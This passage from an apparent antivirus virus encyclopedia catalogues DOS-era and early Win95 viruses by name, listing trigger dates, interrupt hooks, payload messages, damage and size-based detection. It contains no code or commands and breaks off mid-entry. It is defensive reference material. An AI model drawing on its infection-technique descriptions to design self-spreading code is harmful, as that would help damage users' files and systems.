  14022.  
  14023. PC Vectors Hooked: INT 21h, INT 24h
  14024.  
  14025. Execution Procedure:
  14026. 1) Checks whether it is memory resident. If not, it loads itself
  14027.    resident in the high memory.
  14028. 2) Hooks INT 21h and goes back to the original routine.
  14029.  
  14030. Infection Procedure:
  14031. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  14032.    prevent divulging its trace when writing. If the program to be
  14033.    executed is an uninfected COM file, the virus proceeds to infect it.
  14034.  
  14035. Damage: None
  14036.  
  14037. Detection method: Infected files increase by 493 bytes.
  14038.  
  14039. [1241]
  14040. Virus Name: 1241
  14041. Virus Type: File Virus (COM and EXE files)
  14042. Virus Length: 1560-1570 bytes
  14043.  
  14044. PC Vectors Hooked: INT 21h
  14045.  
  14046. Execution Procedure:
  14047. The virus checks whether the current calendar date is later than
  14048. November 13, 1990. If it is, the virus displays the following message:
  14049.  
  14050.     "St Cruz, Dili, 1991 Nov 12.
  14051.     Lusitania Expresso,
  14052.     Freedom for East Timor !"
  14053.  
  14054. Then reboots the system. Otherwise, it will check whether it is memory
  14055. resident. If not, it loads itself resident in the high memory. Then
  14056. hooks INT 21h and goes back to the original routine.
  14057.  
  14058. Infection Procedure:
  14059. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14060.    executed is an uninfected COM or EXE file, the virus proceeds to
  14061.    infect it.
  14062.  
  14063. Damage: None
  14064.  
  14065. Detection method: Infected files increase by 1560-1570 bytes.
  14066.  
  14067. [104]
  14068. Virus Name: 104
  14069. Virus Type: File Virus (COM files)
  14070. Virus Length: 400 bytes
  14071.  
  14072. PC Vectors Hooked: INT 21h
  14073.  
  14074. Execution Procedure:
  14075. 1) Checks whether it is memory resident. If not, it loads itself
  14076.    resident in the high memory.
  14077. 2) Hooks INT 21h and goes back to the original routine.
  14078.  
  14079. Infection Procedure:
  14080. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14081.    is an uninfected COM file, the virus proceeds to infect it.
  14082.  
  14083. Damage: None
  14084.  
  14085. Note: An error message appears when writing because INT 24h has not
  14086. been hanged.
  14087.  
  14088. Detection method: Infected files increase by 400 bytes.
  14089.  
  14090. [Trident]
  14091. Virus Name: Trident
  14092. Virus Type: File Virus (COM and EXE files)
  14093. Virus Length: 2385-2395 bytes
  14094.  
  14095. PC Vectors Hooked: INT 21h, INT 24h
  14096.  
  14097. Execution Procedure:
  14098. 1) Checks whether it is memory resident. If not, it loads itself
  14099.    resident in the high memory.
  14100. 2) Hooks INT 21h and goes back to the original routine.
  14101.  
  14102. Infection Procedure:
  14103. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14104.    prevent divulging its trace when writing.
  14105. 2) Checks whether the DIR command is used (e.g., DIR H*.*). If so, all
  14106.    uninfected COM and EXE files accessed by this command get infected.
  14107.  
  14108. Damage: None
  14109.  
  14110. Detection method: Infected files increase by 2385-2395 bytes.
  14111.  
  14112. [Explode]
  14113. Virus Name: Explode
  14114. Virus Type: File Virus (COM files)
  14115. Virus Length:
  14116.  
  14117. Execution Procedure:
  14118. 1) Searches for all uninfected COM files on the current directory,
  14119.    then proceeds to infect them.
  14120. 2) Checks whether the current month is April or May. If it is, the
  14121.    virus displays the following message:
  14122.  
  14123.      "Your hard drive is about to explode !"
  14124.  
  14125.    The virus then destroys all data on the hard disk. If the calendar
  14126.    shows months other than April and May, the virus displays:
  14127.  
  14128.      "Program too big to fit in memory."
  14129.  
  14130. Damage:
  14131. 1) It sometimes destroys all data on the hard disk.
  14132. 2) It overwrites the original files with the virus code, thus
  14133.    corrupting the files.
  14134.  
  14135. Note:
  14136. 1) It does not stay resident in the memory.
  14137. 2) An error message appears when writing because INT 24h has not been
  14138.    hanged.
  14139.  
  14140. [End-Of]
  14141. Virus Name: End-Of
  14142. Virus Type: File Virus (COM files)
  14143. Virus Length: 783 bytes
  14144.  
  14145. PC Vectors Hooked: INT 21h
  14146.  
  14147. Execution Procedure:
  14148. 1) Checks whether it is memory resident. If not, it loads itself
  14149.    resident in the high memory.
  14150. 2) Hooks INT 21h and goes back to the original routine.
  14151.  
  14152. Infection Procedure:
  14153. 1) Hooks INT 21H(AH=3Bh) to infect files. When accessing other
  14154.    directories, all uninfected COM files on the original directory
  14155.    will be infected.
  14156.  
  14157. Damage: None
  14158.  
  14159. Note: An error message appears when writing because INT 24h has not
  14160. been hanged.
  14161.  
  14162. Detection method: Infected files increase by 783 bytes.
  14163.  
  14164. [Copyr-Ug]
  14165. Virus Name: Copyr-Ug
  14166. Virus Type: File Virus (COM and EXE files)
  14167. Virus Length: 766 bytes
  14168.  
  14169. PC Vectors Hooked: INT 21h
  14170.  
  14171. Execution Procedure:
  14172. 1) Checks whether it is memory resident. If not, it loads itself
  14173.    resident in the high memory.
  14174. 2) Hooks INT 21h and goes back to the original routine.
  14175.  
  14176. Infection Procedure:
  14177. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14178.    executed is an uninfected COM or EXE file, the virus proceeds to
  14179.    infect it.
  14180.  
  14181. Damage: None
  14182.  
  14183. Note: An error message appears when writing because INT 24h has not
  14184. been hanged.
  14185.  
  14186. Detection method: Infected files increase by 766 bytes.
  14187.  
  14188. [Chuang]
  14189. Virus Name: Chuang
  14190. Virus Type: File Virus (COM and EXE files)
  14191. Virus Length:  970 bytes
  14192.  
  14193. Execution Procedure:
  14194. 1) Searches for an uninfected COM file on the current directory,
  14195.    then infects it (It only infects one file at a time).
  14196. 2) Checks whether the current calendar day is later than 12, and
  14197.    current time is 22:00 or later. If these conditions are met,
  14198.    the virus destroys all data on the hard disk.
  14199.  
  14200. Damage:  The virus sometimes destroys all data on the hard disk.
  14201.  
  14202. Note:
  14203. 1) It does not stay resident in the memory.
  14204. 2) An error message appears when writing because INT 24h has not been
  14205.    hanged.
  14206.  
  14207. Detection method: Infected files increase by 970 bytes.
  14208.  
  14209. [Ancient]
  14210. Virus Name: Ancient
  14211. Virus Type: File Virus (COM files)
  14212. Virus Length:  783 bytes
  14213.  
  14214. Execution Procedure:
  14215. 1) Searches for an uninfected COM file on the current directory,
  14216.    then infects it (It only infects one file at a time).
  14217. 2) Cleans the screen or displays various colors of ' * ' until a
  14218.    key is depressed. At that time, a strange sound will emit for
  14219.    approximately 5 minutes. After which, the virus will return to the
  14220.    original program.
  14221.  
  14222. Damage: None
  14223.  
  14224. Note:
  14225. 1) It does not stay resident in the memory.
  14226. 2) An error message appears when writing because INT 24h has not been
  14227.    hanged.
  14228. 3) Reinfects files.
  14229.  
  14230. Detection method: Infected files increase by 783 bytes.
  14231.  
  14232. [Adolf_Hitler]
  14233. Virus Name: Adolf_Hitler
  14234. Virus Type: File Virus (COM files)
  14235. Virus Length: 475 bytes
  14236.  
  14237. PC Vectors Hooked: INT 21h, INT 24h
  14238.  
  14239. Execution Procedure:
  14240. 1) Checks whether it is memory resident. If not, it loads itself
  14241.    resident in the high memory.
  14242. 2) Hooks INT 21h and goes back to the original routine.
  14243.  
  14244. Infection Procedure:
  14245. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14246.    prevent divulging its trace when writing. If the program to be
  14247.    executed is an uninfected COM file, the virus proceeds to infect it.
  14248.  
  14249. Damage: None
  14250.  
  14251. Detection method: Infected files increase by 475 bytes.
  14252.  
  14253. [Fob]
  14254. Virus Name: Fob
  14255. Virus Type: File Virus (COM files)
  14256. Virus Length:  1750-1950 bytes
  14257.  
  14258. Execution Procedure:
  14259. 1) Searches for an uninfected COM file on the current directory,
  14260.    then infects it (only infects one file at a time). There is a
  14261.    50% chance that the virus will display a message asking the user
  14262.    to input the following word: "SLOVAKIA."  The virus will wait
  14263.    until the user inputs this word and will proceed to terminate the
  14264.    program.
  14265.  
  14266. Damage: None
  14267.  
  14268. Note:
  14269. 1) It does not stay resident in the memory.
  14270. 2) An error message appears when writing because INT 24h has not been
  14271.    hanged.
  14272.  
  14273. Detection method: Infected files will ask user to input the word
  14274. "SLOVAKIA," and will not end until the user has done so.
  14275.  
  14276. [Signs]
  14277. Virus Name: Signs
  14278. Virus Type: File Virus (COM files)
  14279. Virus Length:  720 bytes
  14280.  
  14281. PC Vectors Hooked: INT 21h, INT 24h
  14282.  
  14283. Execution Procedure:
  14284. 1) Checks whether it is memory resident. If not, it loads itself
  14285.    resident in the high memory.
  14286. 2) Hooks INT 21h and goes back to the original routine.
  14287. 3) Checks whether the current calendar day is Friday. If it is, the
  14288.    screen will roll up once a minute.
  14289.  
  14290. Infection Procedure:
  14291. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14292.    prevent divulging its trace when writing. If the program to be
  14293.    executed is an uninfected COM file, the virus proceeds to infect it.
  14294.  
  14295. Damage: None
  14296.  
  14297. Detection method: Infected files increase by 720 bytes.
  14298.  
  14299. [Shield]
  14300. Virus Name: Shield
  14301. Virus Type: File Virus (COM files)
  14302. Virus Length:  172 bytes
  14303.  
  14304. PC Vectors Hooked: INT 21h
  14305.  
  14306. Execution Procedure:
  14307. 1) Checks whether it is memory resident. If not, it loads itself
  14308.    resident in the high memory.
  14309. 2) Hooks INT 21h and goes back to the original routine.
  14310.  
  14311. Infection Procedure:
  14312. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14313.    is an uninfected COM file, the virus proceeds to infect it.
  14314.  
  14315. Damage: None
  14316.  
  14317. Note:
  14318. 1) An error message appears when writing because INT 24h has not been
  14319.    hanged.
  14320. 2) The function of the infected program is different from the
  14321.    original. Infected files have no ability to infect other
  14322.    files. But they can display a message when the current month is
  14323.    February. The message reads:
  14324.  
  14325.    "I greet you user .
  14326.     I am COM-CHILD, son of The Breeder Virus.
  14327.     Look out for the RENAME-PROBLEM !"
  14328.  
  14329. Detection method: Infected files increase by 172 bytes.
  14330.  
  14331. [Wishes]
  14332. Virus Name: Wishes
  14333. Virus Type: File Virus (COM and EXE files)
  14334. Virus Length:  970 bytes
  14335.  
  14336. PC Vectors Hooked: INT 21h, INT 24h
  14337.  
  14338. Execution Procedure:
  14339. 1) Checks whether it is memory resident. If not, it loads itself
  14340.    resident in the high memory.
  14341. 2) Hooks INT 21h and goes back to the original routine.
  14342. 3) Checks whether the current calendar day is 13, Friday. If it is,
  14343.    the virus proceeds to destroy all data on the hard disk.
  14344.  
  14345. Infection Procedure:
  14346. 1) Hooks INT 21H (AH=4Bh) to infect files. First, it hangs INT 24h to
  14347.    prevent divulging its trace when writing. If the program to be
  14348.    executed is an uninfected COM or EXE file, the virus proceeds to
  14349.    infect it.
  14350.  
  14351. Damage:  The virus sometimes destroys all data on the hard disk.
  14352.  
  14353. Detection method: Infected files increase by 970 bytes.
  14354.  
  14355. [439]
  14356. Virus Name: 439
  14357. Virus Type: File Virus (COM files)
  14358. Virus Length:  439 bytes
  14359.  
  14360. PC Vectors Hooked: INT 21h, INT 24h
  14361.  
  14362. Execution Procedure:
  14363. 1) Checks whether it is memory resident. If not, it loads itself
  14364.    resident in the high memory.
  14365. 2) Hooks INT 21h and goes back to the original routine.
  14366.  
  14367. Infection Procedure:
  14368. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14369.    prevent divulging its trace when writing. If the program to be
  14370.    executed is an uninfected COM file, the virus proceeds to infect it.
  14371.  
  14372. Damage: None
  14373.  
  14374. Detection method: Infected files increase by 439 bytes.
  14375.  
  14376. [4-A]
  14377. Virus Name: 4-A
  14378. Virus Type: File Virus (COM files)
  14379. Virus Length:  450-460 bytes
  14380.  
  14381. Execution Procedure:
  14382. The virus displays the following message:
  14383.  
  14384.     "-----Hello  , I am virus ! -----".
  14385.  
  14386. The virus then searches for an uninfected COM file on the current
  14387. directory and infects it (It only infects one file at a time).
  14388.  
  14389. Damage: None
  14390.  
  14391. Note:
  14392. 1) It does not stay resident in the memory.
  14393. 2) An error message appears when writing because INT 24h has not been
  14394.    hanged.
  14395.  
  14396. Detection method:
  14397. 1) Infected files display above message when executed.
  14398. 2) Infected files increase by 450-460 bytes.
  14399.  
  14400. [330]
  14401. Virus Name: 330
  14402. Virus Type: File Virus (COM files)
  14403. Virus Length:  330 bytes
  14404.  
  14405. Execution Procedure:
  14406. 1) Searches for an uninfected COM file on the current directory
  14407.    and infects it (It only infects one file at a time).
  14408. 2) Checks whether the current month is July. If it is, the  virus
  14409.    displays the following message:
  14410.  
  14411.     "[330] by ICE-9."
  14412.  
  14413. Damage: None
  14414.  
  14415. Note:
  14416. 1) It does not stay resident in the memory.
  14417. 2) An error message appears when writing because INT 24h has not been
  14418.    hanged.
  14419.  
  14420. Detection method: Infected files increase by 330 bytes.
  14421.  
  14422. [203]
  14423. Virus Name: 203
  14424. Virus Type: File Virus (COM files)
  14425. Virus Length:  203 bytes
  14426.  
  14427. Execution Procedure:
  14428. The virus searches for an uninfected COM file on the current directory,
  14429. then infects it (It only infects one file at a time).
  14430.  
  14431. Damage: None
  14432.  
  14433. Note:
  14434. 1) It does not stay resident in the memory.
  14435. 2) An error message appears when writing because INT 24h has not been
  14436.    hanged.
  14437.  
  14438. Detection method: Infected files increase by 203 bytes.
  14439.  
  14440. [Mr-Vir]
  14441. Virus Name: Mr-Vir
  14442. Virus Type: File Virus (COM files)
  14443. Virus Length:  508 bytes
  14444.  
  14445. Execution Procedure:
  14446. The virus searches for an uninfected COM file on the current directory,
  14447. then infects it (It only infects one file at a time).
  14448.  
  14449. Damage: None
  14450.  
  14451. Note:
  14452. 1) It does not stay resident in the memory.
  14453. 2) An error message appears when writing because INT 24h has not been
  14454.    hanged.
  14455.  
  14456. Detection method: Infected files increase by 508 bytes.
  14457.  
  14458. [Nazgul]
  14459. Virus Name: Nazgul
  14460. Virus Type: File Virus (COM files)
  14461. Virus Length:  266 bytes
  14462.  
  14463. Execution Procedure:
  14464. Virus searches for all uninfected COM files on the current directory,
  14465. then infects them.
  14466.  
  14467. Damage: None
  14468.  
  14469. Note:
  14470. 1) It does not stay resident in the memory.
  14471. 2) An error message appears when writing because INT 24h has not been
  14472.    hanged.
  14473.  
  14474. Detection method: Infected files increase by 266 bytes.
  14475.  
  14476. [Napc]
  14477. Virus Name: Napc
  14478. Virus Type: File Virus (COM and EXE files)
  14479. Virus Length:  729 bytes
  14480.  
  14481. Execution Procedure:
  14482. Virus searches for all uninfected COM and EXE files on the current
  14483. directory, then proceeds to infect them.
  14484.  
  14485. Damage: None
  14486.  
  14487. Note:
  14488. 1) It does not stay resident in the memory.
  14489. 2) An error message appears when writing because INT 24h has not been
  14490.    hanged.
  14491.  
  14492. Detection method: Infected files increase by 729 bytes.
  14493.  
  14494. [Little]
  14495. Virus Name: Little
  14496. Virus Type: File Virus (COM files)
  14497. Virus Length:  665 bytes
  14498.  
  14499. Execution Procedure:
  14500. Virus searches for an uninfected COM file on the current directory,
  14501. then infects it (It only infects one file at a time).
  14502.  
  14503. Damage: None
  14504.  
  14505. Note:
  14506. 1) It does not stay resident in the memory.
  14507. 2) An error message appears when writing because INT 24h has not been
  14508.    hanged.
  14509.  
  14510. Detection method: Infected files increase by 665 bytes.
  14511.  
  14512. [Atte-629]
  14513. Virus Name: Atte-629
  14514. Virus Type: File Virus (COM files)
  14515. Virus Length:  629 bytes
  14516.  
  14517. Execution Procedure:
  14518. Virus searches for an uninfected COM file on the current directory,
  14519. then infects it (It only infects one file at a time).
  14520.  
  14521. Damage: None
  14522.  
  14523. Note:
  14524. 1) It does not stay resident in the memory.
  14525. 2) An error message appears when writing because INT 24h has not been
  14526.    hanged.
  14527.  
  14528. Detection method: Infected files increase by 629 bytes.
  14529.  
  14530. [A&A]
  14531. Virus Name: A&A
  14532. Virus Type: File Virus (COM files)
  14533. Virus Length:  506 bytes
  14534.  
  14535. PC Vectors Hooked: INT 21h, INT 24h
  14536.  
  14537. Execution Procedure:
  14538. 1) Checks whether it is memory resident. If not, it loads itself
  14539.    resident in the high memory.
  14540. 2) Hooks INT 21h and goes back to the original routine.
  14541.  
  14542. Infection Procedure:
  14543. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14544.    prevent divulging its trace when writing. If the program to be
  14545.    executed is an uninfected COM file, the virus proceeds to infect it.
  14546.  
  14547. Damage: None
  14548.  
  14549. Detection method: Infected files increase by 506 bytes.
  14550.  
  14551. [Magnitogorski-3]
  14552. Virus Name: Magnitogorski-3
  14553. Virus Type: File Virus (COM and EXE files)
  14554. Virus Length:  3000 bytes
  14555.  
  14556. PC Vectors Hooked: INT 21h, INT 24h
  14557.  
  14558. Execution Procedure:
  14559. 1) Checks whether it is memory resident. If not, it loads itself
  14560.    resident in the high memory.
  14561. 2) Hooks INT 21h and goes back to the original routine.
  14562.  
  14563. Infection Procedure:
  14564. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14565.    prevent divulging its trace when writing. If the program to be
  14566.    executed is an uninfected COM or EXE file, the virus proceeds to
  14567.    infect it.
  14568.  
  14569. Damage: None
  14570.  
  14571. Detection method: Infected files increase by 3000 bytes.
  14572.  
  14573. [Lpt-Off]
  14574. Virus Name: Lpt-Off
  14575. Virus Type: File Virus (COM files)
  14576. Virus Length:  256 bytes
  14577.  
  14578. PC Vectors Hooked: INT 21h
  14579.  
  14580. Execution Procedure:
  14581. 1) Checks whether it is memory resident. If not, it loads itself
  14582.    resident in the high memory.
  14583. 2) Hooks INT 21h and goes back to the original routine.
  14584.  
  14585. Infection Procedure:
  14586. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14587.    executed is an uninfected COM file, the virus proceeds to infect it.
  14588.  
  14589. Damage: None
  14590.  
  14591. Note: An error message appears when writing because INT 24h has not
  14592. been hanged.
  14593.  
  14594. Detection method: Infected files increase by 256 bytes.
  14595.  
  14596. [Kiwi-550]
  14597. Virus Name: Kiwi-550
  14598. Virus Type: File Virus (EXE files)
  14599. Virus Length:  550-570 bytes
  14600.  
  14601. PC vectors Hooked: INT 21h, INT 24h
  14602.  
  14603. Execution Procedure:
  14604. 1) Checks whether it is memory resident. If not, it loads itself
  14605.    resident in the high memory.
  14606. 2) Hooks INT 21h and goes back to the original routine.
  14607.  
  14608. Infection Procedure:
  14609. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14610.    prevent divulging its trace when writing. If the program to be
  14611.    executed is an uninfected EXE file, the virus proceeds to infect it.
  14612.  
  14613. Damage: None
  14614.  
  14615. Detection method: Infected files increase by 550-570 bytes.
  14616.  
  14617. [Dennis-2]
  14618. Virus Name: Dennis-2
  14619. Virus Type: File Virus (COM and EXE files)
  14620. Virus Length:  897 bytes
  14621.  
  14622. PC Vectors Hooked: INT 21h
  14623.  
  14624. Execution Procedure:
  14625. 1) Checks whether it is memory resident. If not, it loads itself
  14626.    resident in the high memory.
  14627. 2) Hooks INT 21h and goes back to the original routine.
  14628.  
  14629. Infection Procedure:
  14630. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be
  14631.    executed is an uninfected COM or EXE file, the virus proceeds to
  14632.    infect it.
  14633.  
  14634. Damage: None
  14635.  
  14636. Detection method: Infected files increase by 897 bytes.
  14637.  
  14638. [Beer]
  14639. Virus Name: Beer
  14640. Virus Type: File Virus
  14641. Virus Length:
  14642.  
  14643. PC Vectors Hooked: INT 21h, INT 24h
  14644.  
  14645. Execution Procedure:
  14646. 1) Checks whether it is memory resident. If not, it loads itself
  14647.    resident in the high memory.
  14648. 2) Hooks INT 21h and goes back to the original routine.
  14649.  
  14650. Infection Procedure:
  14651. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14652.    prevent divulging its trace when writing. If the program to be
  14653.    executed is an uninfected file, the virus proceeds to infect it.
  14654.  
  14655. Damage: None
  14656.  
  14657. Note: This virus has at least three variations.
  14658.  
  14659. [2560]
  14660. Virus Name: 2560
  14661. Virus Type: File Virus (COM and EXE files)
  14662. Virus Length:  2560 bytes
  14663.  
  14664. PC vectors hooked: INT 21h, INT 24h
  14665.  
  14666. Execution Procedure:
  14667. 1) Checks whether it is memory resident. If not, it loads itself
  14668.    resident in the high memory.
  14669. 2) Hooks INT 21h and goes back to the original routine.
  14670.  
  14671. Infection Procedure:
  14672. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14673.    prevent divulging its trace when writing. If the program to be
  14674.    executed is an uninfected COM or EXE file, the virus proceeds to
  14675.    infect it.
  14676.  
  14677. Damage: None
  14678.  
  14679. Detection method: Infected files increase by 2560 bytes.
  14680.  
  14681. [Atas-3321]
  14682. Virus Name: Atas-3321
  14683. Virus Type: File Virus (COM files)
  14684. Virus Length:  3321 bytes
  14685.  
  14686. PC Vectors Hooked: INT 21h, INT 24h
  14687.  
  14688. Execution Procedure:
  14689. 1) Checks whether it is memory resident. If not, it loads itself
  14690.    resident in the high memory.
  14691. 2) Hooks INT 21h and goes back to the original routine.
  14692.  
  14693. The virus can only execute its program on DOS 3.3.
  14694.  
  14695. Infection Procedure:
  14696. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14697.    prevent divulging its trace when writing. If the program to be
  14698.    executed is an uninfected COM file, the virus proceeds to infect it.
  14699.  
  14700. Damage: None
  14701.  
  14702. Detection method: Infected files increase by 3321 bytes.
  14703.  
  14704. [Ecu]
  14705. Virus Name: Ecu
  14706. Virus Type: File Virus (EXE files)
  14707. Virus Length:  711 bytes
  14708.  
  14709. PC Vectors Hooked: INT 21h, INT 24h
  14710.  
  14711. Execution Procedure:
  14712. 1) Checks whether it is memory resident. If not, it loads itself
  14713.    resident in the high memory.
  14714. 2) Hooks INT 21h and goes back to the original routine.
  14715.  
  14716. The virus can only execute its program on DOS 3.3.
  14717.  
  14718. Infection Procedure:
  14719. 1) Hooks INT 21H(AH=4Bh) to infect files. First, it hangs INT 24h to
  14720.    prevent divulging its trace when writing. If the program to be
  14721.    executed is an uninfected EXE file, the virus proceeds to infect it.
  14722.  
  14723. Damage: Most infected files cannot execute.
  14724.  
  14725. Detection method: Infected files increase by 711 bytes.
  14726.  
  14727. [N1]
  14728. Virus Name: N1
  14729. Virus Type: File Virus (COM files)
  14730. Virus Length: 10,230-10,240 bytes
  14731.  
  14732. Execution Procedure:
  14733. The virus searches for an uninfected COM file on the current directory,
  14734. then infects it (only infects one file at a time). The virus then
  14735. displays the following message:
  14736.  
  14737. "This File Has Been Infected By NUMBER One!"
  14738.  
  14739. Damage: None
  14740.  
  14741. Note:
  14742. 1) It does not stay resident in the memory.
  14743. 2) An error message appears when writing because INT 24h has not been
  14744.    hanged.
  14745.  
  14746. Detection method: Infected files will display the above message when
  14747. executed.
  14748.  
  14749. [Arcv-718]
  14750. Virus Name: Arcv-718
  14751. Virus Type: File Virus (COM and EXE files)
  14752. Virus Length:  718 bytes
  14753.  
  14754. PC Vectors Hooked: INT 21h
  14755.  
  14756. Execution Procedure:
  14757. 1) Checks whether it is memory resident. If not, it loads itself
  14758.    resident in the high memory.
  14759. 2) Hooks INT 21h and goes back to the original routine.
  14760. 3) Checks whether the current date is between 1 and 7, January.
  14761.    If it is, the virus displays the following message and proceeds to
  14762.    hang the system:
  14763.  
  14764.      "Hello Dr Sol & Fido Lurve U lots...    "
  14765.  
  14766. Infection Procedure:
  14767. 1) Hooks INT 21H(AH=4Bh) to infect files. If the program to be executed
  14768.    is an uninfected COM or EXE file, the virus proceeds to infect it.
  14769.  
  14770. Damage: Virus will sometimes halt the system.
  14771.  
  14772. Detection method: Infected files increase by 718 bytes.
  14773.  
  14774. [L-933]
  14775. Virus Name: L-933
  14776. Virus Type: File Virus (COM files)
  14777. Virus Length:  933-950 bytes
  14778.  
  14779. Execution Procedure:
  14780. 1) Searches for an uninfected COM file on the current directory,
  14781.    then infects it (only infects one file at a time).
  14782. 2) Checks the current date.
  14783.    i)  If it is March 8, the virus destroys all data on the hard disk.
  14784.    ii) If it is September 1, the virus deletes itself.
  14785.  
  14786. Damage:  Virus will sometimes destroy all data on the hard disk.
  14787.  
  14788. Note:
  14789. 1) It does not stay resident in the memory.
  14790. 2) An error message appears when writing because INT 24h has not been
  14791.    hanged.
  14792.  
  14793. Detection method: Infected files increase by 933-950 bytes.
  14794.  
  14795. [Alpha743]
  14796. Virus Name: Alpha743
  14797. Virus Type: File Virus (COM files)
  14798. Virus Length:  743 bytes
  14799.  
  14800. Execution Procedure:
  14801. 1) Searches for an uninfected COM file on the current directory,
  14802.    then infects it (only infects one file at a time).
  14803. 2) Checks whether the current year is 1993 or later. If current month
  14804.    is later than February, and current day is 5, the virus displays the
  14805.    following message:
  14806.  
  14807.         "Your PC has ALPHA virus.
  14808.          Brought to you by the ARCV
  14809.          Made in ENGLAND"
  14810.  
  14811. Damage: None
  14812.  
  14813. Note:
  14814. 1) It does not stay resident in the memory.
  14815. 2) An error message appears when writing because INT 24h has not been
  14816.    hanged.
  14817.  
  14818. Detection method: Infected files increase by 743 bytes.
  14819.  
  14820. [Clint]
  14821. Virus Name: Clint
  14822. Virus Type: File Virus (COM and EXE files)
  14823. Virus Length:
  14824.  
  14825. Execution Procedure:
  14826. 1) Searches for an uninfected COM or EXE file on the current directory,
  14827.    then infects it (infects four files at a time).
  14828. 2) Displays the following message:
  14829.  
  14830.    "memory allocation error !"
  14831.  
  14832. Damage: It overwrites the original files with the virus code, thus
  14833. corrupting the files.
  14834.  
  14835. Note:
  14836. 1) It does not stay resident in the memory.
  14837. 2) An error message appears when writing because INT 24h has not been
  14838.    hanged.
  14839.  
  14840. Detection method: Infected files display the above message when
  14841. executed.
  14842.  
  14843. [Love-Child-2710]
  14844. Virus Name: Love-Child-2710
  14845. Virus Type: File Virus (COM files)
  14846. Virus Length:  2710 bytes
  14847.  
  14848. PC Vectors Hooked: INT 13h, INT 24h
  14849.  
  14850. Execution Procedure:
  14851. 1) Checks whether the current date is one of the following dates:
  14852.    November 5, February 22, June 23, August 24, or October 6, or
  14853.    that the system is not DOS 3.3. If these conditions are met, the
  14854.    virus destroys the Partition and parts of FAT. If conditions are not
  14855.    met, the virus checks whether it is memory resident. If not, it
  14856.    loads itself resident in the high memory.
  14857. 2) Hooks INT 13h and goes back to original routine.
  14858.  
  14859. Infection Procedure:
  14860. 1) Hooks INT 13H to infect files. First, it hangs INT 24h to prevent
  14861.    divulging its trace when writing. If the program to be executed is
  14862.    an uninfected COM file, the virus proceeds to infect it.
  14863.  
  14864. Damage: Virus sometimes destroys the Partition and parts of FAT.
  14865.  
  14866. Detection method: Infected files increase by 2710 bytes.
  14867.  
  14868. [Basedrop]
  14869. Virus Name: Basedrop
  14870. Virus Type: File Virus (EXE files)
  14871. Virus Length:
  14872.  
  14873. Execution Procedure:
  14874. 1) There is a 25% chance that the virus will do the following:
  14875.    Search for an uninfected EXE file on the current directory, then
  14876.    infect it (only infects one file at a time).
  14877. 2) There is a 25% chance that the virus will do the following:
  14878.    Carry-out the above procedure. Then, display a message asking the
  14879.    user to input the following word: "SLOVAKIA." The virus
  14880.    will wait until the user inputs this word.  Virus will then
  14881.    terminate.
  14882. 3) There is a 50% chance that the virus program will not infect
  14883.    files.
  14884.  
  14885. Damage: None
  14886.  
  14887. [Arianna]
  14888. Virus Name:  ARIANNA
  14889. Virus Type: Multi-partite virus
  14890. 1. High memory resident file infector. The ARIANNA virus will
  14891.    only infect .EXE files which are shorter than 70000H bytes in
  14892.    length and bigger than 1770H bytes in length.
  14893. 2. Partition sector infector.  This virus overwrites the last 9
  14894.    sectors of the hard drive.
  14895. Virus Length:  3426 bytes (EXE files), 3586 (memory)
  14896.  
  14897. PC Vectors Hooked:  INT 21h
  14898.  
  14899. Infection Process: This virus is spread by executing an infected
  14900. program or a computer  with a partition that has been infected.
  14901. When a file infected with the ARIANNA virus is executed, it will
  14902. check to see if it is already resident in the memory by checking to
  14903. see if the return value of ax is equal to 0 after int
  14904. 2f(ax=FE01). If the virus is already in the memory it will execute the
  14905. infected program. The virus code remains resident in the high memory.
  14906.  
  14907. Damage:  Decreases available memory. Infected files increase by 3426
  14908. bytes.
  14909.  
  14910. Symptoms: While the ARIANNA virus is resident in memory you
  14911. cannot alter the HD partition to cause any damage to the partition
  14912. sector by cleaning it. The way to clean the ARIANNA virus from
  14913. the system is to boot up the computer with a clean
  14914. system diskette and overwrite the infected partition sector with
  14915. the No.9.
  14916.  
  14917. [Boza]
  14918. Virus Name: Boza
  14919. Alias Name: Bizatch
  14920. Virus Type: File Virus (EXE files)
  14921. Virus Length: 2,680 bytes
  14922.  
  14923. Execution Procedure:
  14924. When an infected file is executed, the virus
  14925. does not install itself into memory.  The virus
  14926. will infect files which are in Microsoft's Win32
  14927. Portable Executable (PE) file format which means
  14928. that the virus will only infect Win95 and Win32S
  14929. executable files.  The virus attempts to infect
  14930. up to three files in the current directory;
  14931. however, due to some bugs in the program it may
  14932. end up corrupting the files it infects.
  14933.  
  14934. When the system date reaches the 31st of any month
  14935. the virus will display the following message:
  14936.  
  14937.   "The taste of fame just got tastier!
  14938.    VLAD Australia does it again with
  14939.    the world's first Win95 Virus.
  14940.  
  14941.    From the old school to the new.
  14942.  
  14943.    Metabolis
  14944.    Qark
  14945.    Darkman
  14946.    Automag
  14947.    Antigen
  14948.    RhinceWind
  14949.    Quantum
  14950.    Absolute Overload
  14951.    CoKe"
  14952.  
  14953. The virus also contains the following text string:
  14954.  
  14955.   "Please note: the name of this virus is [Bizatch]
  14956.    written by Quantum of VLAD"
  14957.  
  14958. [Word_Demonstrate]
  14959. Virus Name: Word.Demonstrate (Demonstration Macro Virus)
  14960. Virus Type: Word macro virus
  14961. Virus Length: N/A
  14962.  
  14963. Description: This virus infects MS Word documents.
  14964.  
  14965. This virus consists of the following macro:
  14966.  
  14967.     AutoClose
  14968.  
